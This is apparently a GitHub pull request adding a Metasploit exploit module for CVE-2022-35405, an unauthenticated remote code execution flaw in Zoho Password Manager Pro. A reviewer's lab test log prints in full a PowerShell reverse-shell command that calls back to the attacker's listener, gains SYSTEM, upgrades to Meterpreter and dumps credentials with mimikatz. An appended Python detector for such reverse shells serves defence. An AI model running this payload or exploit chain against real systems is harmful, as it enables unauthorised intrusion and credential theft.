
Add CVE-2022-35405 Zoho Password Manager Pro XML-RPC Unauthenticated RCE #16852

Merged
merged 3 commits into from
Aug 2, 2022

Conversation

gwillcox-r7
Contributor

@gwillcox-r7 gwillcox-r7 commented Aug 2, 2022

Add in exploit for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE

Setup for this can be found in the documentation and should be fairly simple to test. Let me know if you have any questions.

Successful exploitation should work as an unauthenticated user and should grant RCE as the SYSTEM user.

Verification

List the steps needed to make sure this thing works

  • Follow the installation instructions in the documentation.
  • Start msfconsole
  • Do: use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
  • Do: set RHOSTS [IP]
  • Do: set payload [payload]
  • Do: set LHOST [IP]
  • Optional: set LPORT [local port to listen on]
  • Do: exploit

@wvu
Contributor

wvu commented Aug 2, 2022

Nice!

@gwillcox-r7
Contributor Author

> Nice!

Thanks for putting up the PR that was the template for this work over at #14000 👍

@wvu
Contributor

wvu commented Aug 2, 2022

> Nice!
>
> Thanks for putting up the PR that was the template for this work over at #14000 👍

I figured, hah!

@jheysel-r7
Contributor

Thanks for the great module Grant. Testing checks out and is as expected 👍

msf6 > use zoho_password_manager_pro_xml_rpc_rc
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > 
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set rhosts 172.16.199.134
rhosts => 172.16.199.134
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Windows Command for cmd/windows/reverse_powershell
[+] Successfully executed command: powershell -w hidden -nop -c $a='172.16.199.1';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $r=$os.BaseStream.EndRead($osread);      $s.Write($ob,0,$r);      $s.Flush();      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $r=$es.BaseStream.EndRead($esread);      $s.Write($eb,0,$r);      $s.Flush();      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {        break;    }    if ($p.ExitCode -ne $null) {        break;    }}
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.134:51626) at 2022-08-02 14:33:28 -0400


Shell Banner:
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\ManageEngine\PMP\bin>
-----


C:\Program Files\ManageEngine\PMP\bin>whoami
whoami
nt authority\system

C:\Program Files\ManageEngine\PMP\bin>background

Background session 1? [y/N]  y
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.199.1:4433
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > WARNING: Local file /Users/jheysel/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework

[*] Sending stage (222278 bytes) to 172.16.199.134
WARNING: Local file /Users/jheysel/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /Users/jheysel/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 2 opened (172.16.199.1:4433 -> 172.16.199.134:51861) at 2022-08-02 14:35:43 -0400
[*] Stopping exploit/multi/handler

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                      Connection
  --  ----  ----                     -----------                                                                      ----------
  1         shell cmd/windows        Shell Banner: Microsoft Windows [Version 10.0.19042.1706] (c) Microsoft Corp...  172.16.199.1:4444 -> 172.16.199.134:51626 (172.16.199.134)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-SF7KLAH                                            172.16.199.1:4433 -> 172.16.199.134:51861 (172.16.199.134)

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > load kiwi
Loading extension kiwi...WARNING: Local file /Users/jheysel/rapid7/metasploit-framework/data/meterpreter/ext_server_kiwi.x64.dll is being used

  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
msfuser   DESKTOP-SF7KLAH  a1074a69b1bde45403ab680504bbdd1a  034383fd4ee916f5a91d1483c31134a1e42cc84f

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-SF7KLAH$  WORKGROUP        (null)
msfuser           DESKTOP-SF7KLAH  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-sf7klah$  WORKGROUP        (null)
msfuser           DESKTOP-SF7KLAH  (null)


meterpreter >
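For the defender's side of the test log above: the payload that landed is a hidden, no-profile PowerShell opening a raw TcpClient back to LHOST, and the resulting shell sits in C:\Program Files\ManageEngine\PMP\bin. The following is an added example, not code from the PR or the module, that scores constructed Sysmon-style process-creation events for those traits; the assumption that the parent process image lives under \ManageEngine\PMP\ is mine (the log only shows that path as the shell's working directory).

```python
import re

# Constructed Sysmon-style process-creation events, one per line (key=value pairs
# joined by '|'). These are made-up records, not lines from the PR's test log.
SAMPLE_EVENTS = [
    # Benign: PMP's Java process running a maintenance batch file
    r"ParentImage=C:\Program Files\ManageEngine\PMP\jre\bin\java.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c backup.bat",
    # Suspicious: the cmd/windows/reverse_powershell traits seen in the PR log
    r"ParentImage=C:\Program Files\ManageEngine\PMP\jre\bin\java.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -nop -c $a='172.16.199.1';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize",
    # Benign: an administrator opening PowerShell interactively
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe",
    # Suspicious payload traits under an unrelated parent: still scores on the command line
    r"ParentImage=C:\Windows\System32\svchost.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -nop -w hidden -c $c=New-Object System.Net.Sockets.TCPClient('10.0.0.5',443)",
]

# Assumed: the PMP service's children run from the install tree the PR's shell
# prompt shows (C:\Program Files\ManageEngine\PMP). The parent image name is a guess.
PMP_PATH = re.compile(r"\\ManageEngine\\PMP\\", re.I)
POWERSHELL = re.compile(r"\\powershell(\.exe)?$", re.I)
HIDDEN_OR_NOPROFILE = re.compile(r"(-w(indowstyle)?\s+hidden|-nop\b)", re.I)  # flags in the PR's payload
TCPCLIENT = re.compile(r"new-object\s+system\.net\.sockets\.tcpclient", re.I)  # raw socket back to LHOST

def parse_event(line):
    """Split a flattened 'key=value|key=value' event into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields

def score_event(fields):
    """Return (score, reasons); only PowerShell children are considered."""
    reasons = []
    if not POWERSHELL.search(fields.get("Image", "")):
        return 0, reasons
    cmd = fields.get("CommandLine", "")
    if PMP_PATH.search(fields.get("ParentImage", "")):
        reasons.append("PowerShell spawned from under the PMP install tree")
    if HIDDEN_OR_NOPROFILE.search(cmd):
        reasons.append("hidden window / no-profile flags")
    if TCPCLIENT.search(cmd):
        reasons.append("raw TcpClient in the command line (reverse shell trait)")
    return len(reasons), reasons

def find_alerts(events, threshold=2):
    """Return (line, score, reasons) for every event scoring at or above threshold."""
    alerts = []
    for line in events:
        score, reasons = score_event(parse_event(line))
        if score >= threshold:
            alerts.append((line, score, reasons))
    return alerts
```

Run against the constructed events, the PMP-spawned reverse shell scores 3 and the svchost-parented one scores 2, while both benign events score 0; raising the threshold to 3 keeps only the event whose parent is under the PMP tree.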

@jheysel-r7 jheysel-r7 merged commit 82182f7 into rapid7:master Aug 2, 2022
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 2, 2022
@jheysel-r7
Contributor

Release Notes

This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE

@gwillcox-r7 gwillcox-r7 deleted the zoho_cve-2022-35405 branch August 2, 2022 22:33